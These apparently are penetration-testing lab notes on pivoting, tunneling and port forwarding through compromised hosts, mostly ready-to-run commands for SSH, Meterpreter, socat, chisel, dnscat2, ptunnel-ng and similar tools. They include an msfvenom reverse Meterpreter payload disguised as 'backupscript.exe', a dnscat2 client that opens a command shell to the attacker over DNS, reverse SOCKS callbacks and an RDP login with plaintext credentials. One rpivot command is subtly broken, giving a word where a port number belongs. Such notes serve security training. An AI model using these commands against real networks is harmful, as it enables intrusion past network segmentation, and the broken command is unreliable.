Pivoting, Tunneling, and Port Forwarding

Introduction

  • Pivoting is a technique that allows access to network segments beyond the initial compromised host. When valid credentials are obtained for a machine but the attack host cannot directly reach the target network, pivoting enables further exploration by routing traffic through the compromised system.

  • Before diving into the techniques, let’s define the core terms:

    • Pivoting: Using a compromised host to access isolated networks, bypassing physical or virtual segmentation.

    • Tunneling: Encapsulating network traffic within another protocol to route it through a pivot host.

    • Port Forwarding: Redirecting traffic from one port to another, often used with tunneling to reach specific services.

  • A strong understanding of networking fundamentals (e.g., TCP/IP, routing, and firewalls) is essential for successful pivoting.

SSH Port Forwarding

  • SSH can be used for port forwarding, enabling both local and remote connections through a pivot host.

Local Port Forwarding

  • Local port forwarding lets you connect a port on your attack machine to a service on a remote network via an SSH session. It’s perfect when you know exactly which ports you need to hit.

ssh -L <Local-Port>:localhost:<Remote-Port> <Username>@<IP-Address>
Example: ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
  • This forwards local port 1234 to the remote host’s port 3306. Multiple ports can be forwarded:

ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

# Check using:
netstat -antp | grep 1234

Run commands:
nmap -v -sV -p1234 localhost

Dynamic Port Forwarding

  • Dynamic port forwarding creates a SOCKS proxy for flexible scanning when target ports are unknown. Start with:

ssh -D 9050 ubuntu@10.129.202.64
  • The -D flag enables a SOCKS listener on port 9050. Configure Proxychains by adding to /etc/proxychains.conf:socks4 127.0.0.1 9050

  • Run commands through Proxychains:

# Example:
proxychains nmap -v -sn 172.16.5.1-200

Note: Proxychains supports only full TCP connect scans (-sT), as it cannot handle partial packets.

Remote (Reverse) Port Forwarding

  • Remote port forwarding allows a remote host to connect back to the attack machine, useful for reverse shells. Use:

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<IP-Address> -vN
  • The -vN flags enable verbose output and prevent a login shell. This forwards traffic from the pivot’s port 8080 to the attack host’s port 8000.

Meterpreter Tunneling & Port Forwarding

  • Meterpreter, part of Metasploit, supports pivoting without SSH. Set up a SOCKS proxy:

use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 9050
set version 4a
run

# Remember to update proxychains config:
socks4 127.0.0.1 9050

# Then
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

# Alternatively, from Meterpreter:
run autoroute -s 172.16.5.0/23

# List routes (To Check):
run autoroute -p

# Run commands using proxychains:
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
  • We can also do port forwarding using metasploit:

portfwd add -l 3300 -p 3389 -r 172.16.5.19
  • This forwards local port 3300 to the target’s port 3389. You can then RDP: xfreerdp /v:localhost:3300 /u:victor /p:pass@123

  • We can also do reverse portforwarding: portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Socat

  • Socat is a bidirectional relay tool for tunneling without SSH.

# Forward traffic:
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Create a bind shell redirector:
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# Generate a payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

Additional Tools

Plink.exe

  • Plink, part of PuTTY, enables SSH tunneling on Windows: plink -ssh -D 9050 ubuntu@10.129.15.50

  • Use Proxifier to route traffic through the SOCKS proxy.

Sshuttle

  • Sshuttle pivots over SSH without Proxychains: sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Rpivot

  • Rpivot creates a reverse SOCKS proxy. On the attack host: python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

  • Transfer Rpivot to the target: scp -r rpivot ubuntu@<IP-Address>:/home/ubuntu/

  • On the target: python2.7 client.py --server-ip 10.10.14.18 --server-port Lavalanche

  • Then run commands: curl --socks4 127.0.0.1:9050 172.16.5.135

Windows Netsh

  • Netsh configures port forwarding on Windows: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25

  • You can verify using: netsh.exe interface portproxy show v4tov4

DNS Tunneling with Dnscat2

  • Dnscat2 tunnels data via DNS. On the attack host: sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

  • On the target (Windows): Start-Dnscat2 -DNSserver 10.10.15.111 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd

SOCKS5 Tunneling with Chisel

  • Chisel tunnels TCP/UDP over HTTP. On the pivot target: ./chisel server -v -p 1234 --socks5

  • On the attack host: ./chisel client -v 10.129.202.64:1234 socks

  • Update /etc/proxychains.conf: socks5 127.0.0.1 1080

  • For reverse tunneling:

sudo ./chisel server --reverse -v -p 1234 --socks5
./chisel client -v 10.10.14.17:1234 R:socks

ICMP Tunneling with Ptunnel-ng

  • Ptunnel-ng uses ICMP for tunneling. On the pivot: sudo ./ptunnel-ng -r10.129.202.64 -R22

  • On the attack host: sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

  • SSH through the tunnel: ssh -p2222 -lubuntu 127.0.0.1

  • For dynamic forwarding: ssh -D 9050 -p2222 -lubuntu 127.0.0.1

RDP Tunneling with SocksOverRDP

  • SocksOverRDP tunnels over RDP. Register the DLL: regsvr32.exe SocksOverRDP-Plugin.dll

  • Run SocksOverRDP-Server.exe on the target and configure Proxifier to forward traffic to 127.0.0.1:1080.

Last updated